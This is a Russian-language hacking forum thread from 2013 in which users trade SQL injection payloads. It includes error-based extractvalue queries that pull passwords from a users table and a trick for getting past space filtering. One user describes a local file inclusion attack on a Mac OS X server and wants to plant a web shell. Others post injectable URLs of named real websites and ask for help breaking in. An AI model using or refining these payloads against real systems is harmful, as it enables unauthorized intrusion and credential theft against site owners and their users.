 |
|
01.08.2013, 20:49
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Дело обстоит так.. есть сайт, на котором можно узнать version; database запросом
Код:
and(extractvalue(1,concat(0x3a,database())))and'
, а для получения пароля нужно выполнить запрос (Источник кн. Дмитрий Евтеев Positive technologies стр. 24)
Код:
and(extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))and'
задача заключается в том, чтобы обойти ПРОБЕЛЫ .. Знатоки, помогите! |
|
|
01.08.2013, 21:11
|
|
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
С нами:
6941846
Репутация:
-7
|
|
Сообщение от Unknowhacker
Дело обстоит так.. есть сайт, на котором можно узнать version; database запросом
Код:
and(extractvalue(1,concat(0x3a,database())))and'
, а для получения пароля нужно выполнить запрос (Источник кн. Дмитрий Евтеев Positive technologies стр. 24)
Код:
and(extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))and'
задача заключается в том, чтобы обойти ПРОБЕЛЫ .. Знатоки, помогите! select(password)from(tables)where(id=1)
только грешно взломами....
|
|
|
|
01.08.2013, 23:25
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Сообщение от Грабитель
select(password)from(tables)where(id=1)
только грешно взломами....
Переделал на
Код:
and(extractvalue(1,concat(0x3a,select(password)from(tables)where(id=1))))and'
... не хочет зараза дикая
|
|
|
|
02.08.2013, 02:04
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
LFI провожу на сервере, на котором Mac OS X
После двухдневного копания, отрыла логи error_log, не обновлялся с 2010 года, притом судя по последней записи "Defaced", этот лог тогда кто-то явно отравил
В связи с этим вопрос: можно ли на Mac OS x найти некое подобие proc/self/environ ? Где бы писался user-agent?
php://filter работает, но удалось посмотреть исходный код только main.php
Нашла логин, пароль, бд от MySQL sphinx, но дело дохлое: только local host connection
надо лить шелл...но как это сделать на этом *** Mac OS X
|
|
|
|
03.08.2013, 13:37
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
Сообщение от OxoTnik
Посмотри другие логи, пути тут http://wiki.apache.org/httpd/DistrosDefaultLayout
не, НЕТУ
мЕНЯ НАСТОРАЖИВАЕТ, что все конфиги updat'ы 2010 года. что это значит? Сайт живой, обновляется просто постоянно, постоянный доступ посетителей....
edit: хотя нет, /var/log/secure.log обновляется сегодняшним днем к примеру
|
|
|
|
03.08.2013, 14:10
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Ничего настораживающего. Рабочие логи, как могут быть в другом месте, так и вовсе быть отключены в целях повышеня производительности. Можно попробовать поискать субдомены, обычно на технических, девелоп и тп сабах логи включены, не требуют тонкого тюнинга и тп.
|
|
|
|
03.08.2013, 15:08
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
Сообщение от Cennarios
Ничего настораживающего. Рабочие логи, как могут быть в другом месте, так и вовсе быть отключены в целях повышеня производительности. Можно попробовать поискать субдомены, обычно на технических, девелоп и тп сабах логи включены, не требуют тонкого тюнинга и тп.
хм, спасибо, попробую в суб-доменах поискать....
EDIT: в суб-доменах та же херь
|
|
|
|
05.08.2013, 15:16
|
|
Познающий
Регистрация: 20.08.2012
Сообщений: 49
С нами:
7225526
Репутация:
0
|
|
Помогите раскрутить
Код:
http://www.hochuvotpusk.ru:80/info.php?id=41
|
|
|
|
05.08.2013, 16:47
|
|
Познающий
Регистрация: 11.09.2012
Сообщений: 30
С нами:
7193846
Репутация:
0
|
|
Ребят, нашёл это: http://rp-gameworld.ru/misc/ что можно сделать с этим?
|
|
|
|
05.08.2013, 18:39
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Код:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+
Кто осилит? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
